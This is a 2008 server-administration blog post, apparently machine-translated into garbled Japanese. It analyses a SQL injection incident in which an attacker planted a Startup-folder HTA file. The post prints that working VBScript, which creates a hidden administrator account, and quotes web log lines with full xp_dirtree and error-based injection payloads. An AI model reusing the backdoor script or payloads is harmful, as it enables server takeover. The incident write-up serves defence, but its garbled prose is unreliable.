ハッキング事例 - SQL Injection 利用した 手始め プログラム メニューに ストリブト 登録
www.wssplex.net
次は, SQL Injection を 利用して 手始め プログラムに 勘定 生成を する スクリプトを 登録した 場合 です. おこる 勘定を 削除 しても 手始め プログラムに 登録されたことを 見つけるの できなければ ログイン する度に 生成が なりますね..;;
このようなことが 可能な 理由が, 開発過程で ウェブ連動 DB 勘定を sa 勘定 そのまま 実際 ウェブサービスに 修正なしに ところで 配布を してしまうこと だからです.
また 開発の時 面倒だという 理由も あって, 一部は sa を 使えば DBサーバーを 内 わがまま 思うままに すること イッヌンゴッのように 何か 良いという めどがはっきりしない 考えたちも あること ようで..-_-;;
比喩を 入ろうとすると, 汲む 集めてから 足が 治日 位に ウェブに 公開されて 散らばって あるのが SQL Injection 文書たちで, 講座たちで, ニュース 入れます.
開発者たちに このようなもの 修正しなさいと それでは かなり多い数が 非常に 面倒で します..
ハッキングは サーバーが あったのよ,.. 私が 組んだ プログラムは 寝る 作動すれば なるの ないか? こういう つもりでしょうか??..
lzhe.hta ファイル
<SCRIPT LANGUAGE="VBScript">
on error resume next
Set WS = createobject("WScript.Shell")
WS.run "cmd /c net1.exe user azhe$ xiamingzhe$123 /add&&cmd /c net1.exe localgroup administrators azhe$ /add",0
</Script>
<script language=javascript>window.close();</script>
スクリプトは 非常に 簡単です..
ところが, 敢えて 上と ような スクリプトを 手始め プログラムに 登録する 必要が ありましょうか?.
どっちみち 該当 サイトは 続いて sa 勘定を 苦いだろうし,. あの時 あの時 xp_cmdshell を 利用して 生成して 必要な 作業の後 勘定は 削除すれば なりますが...
イベント 形式: 成功 感謝
イベント 原本: Security
イベント 範疇: 勘定 管理
イベント ID: 624
説明:
作られた 使用者 勘定:
鳥 勘定 名前: azhe$
鳥 ドメイン: WSSPLEX
鳥 勘定 ID: %{S-1-5-21-1482476501-1844823847-725345543-1008}
呼び出し者 使用者 名前: wssplex
呼び出し者 ドメイン: WSSPLEX
呼び出し者 ログオン ID: (0x0,0x27A41AC)
権限 -
WWW ログ中 一部 です.
何 見る必要も ないです... 今は こういう ウェブハッキングは あまり 簡単な ハッキング 技術なので....
123.52.160.191 - 80 GET /wssplex.asp code=movement&snum=713;DROP%20TABLE%20D99_Tmp;CREATE%20TABLE%20D99_Tmp(subdirectory%20VARCHAR(100),depth%20VARCHAR(100),[file]%20VARCHAR(100))%20%20Insert%20D99_Tmp%20exec%20master..xp_dirtree%20"C:\Documents%20and%20Settings\All%20Users\手始め%20メニュー\プログラム\手始めプログラム\",%201,1-- 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0)
123.52.160.191 - 80 GET /wssplex.asp code=movement&snum=713%20And%20(Select%20Top%201%20char(124)%2BCast([file]%20as%20varchar(8000))%2Bsubdirectory%2Bchar(124)%20From%20(Select%20Top%201%20[subdirectory],[file]%20From%20D99_Tmp%20ORDER%20BY%20[file],[subdirectory])%20D%20ORDER%20BY%20[file]%20desc%20,%20[subdirectory]%20desc)=0%20%20--|10|80040e07|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]varchar_値段_'|1サービス_管理者.lnk|'を(を)_int_データ_形式の_熱で_変換する_中_構文_間違いが_発生しました. 500 Internet+Explorer+6.0
WebKnight ような 公開 ウェブ防火壁 モジュールも あることは するが,. 最初 サイト 開発 当時に 保安 要素を 全然 考慮するの なかった だから off すると する フィルターが 多くなるように なります.
言わば,. wssplex.asp?cmd=list のように 掲示板の モードに 使う リポロの 変数人を cmd 路 使う 場合 のように ね.
サーバー側では 防御するのが 限界が あります.
私の いくら ウェブ防火壁 技術が 走って 出ると しても 仮装(家長) 良い 代案は コード 改善です.
結局 これと ような ハッキングが ジソックドエヌンした, 最近の DDoS 攻撃は 止めるの ない のです.
ハッキング,
SQL Injection,
ウェブ防火壁,
WebKnight,
UrlScan,
サーバー管理,
サーバー運営
http://www.wssplex.net/TipnTech.aspx?Seq=419
Posted on Tuesday, 2008/04/01 22:05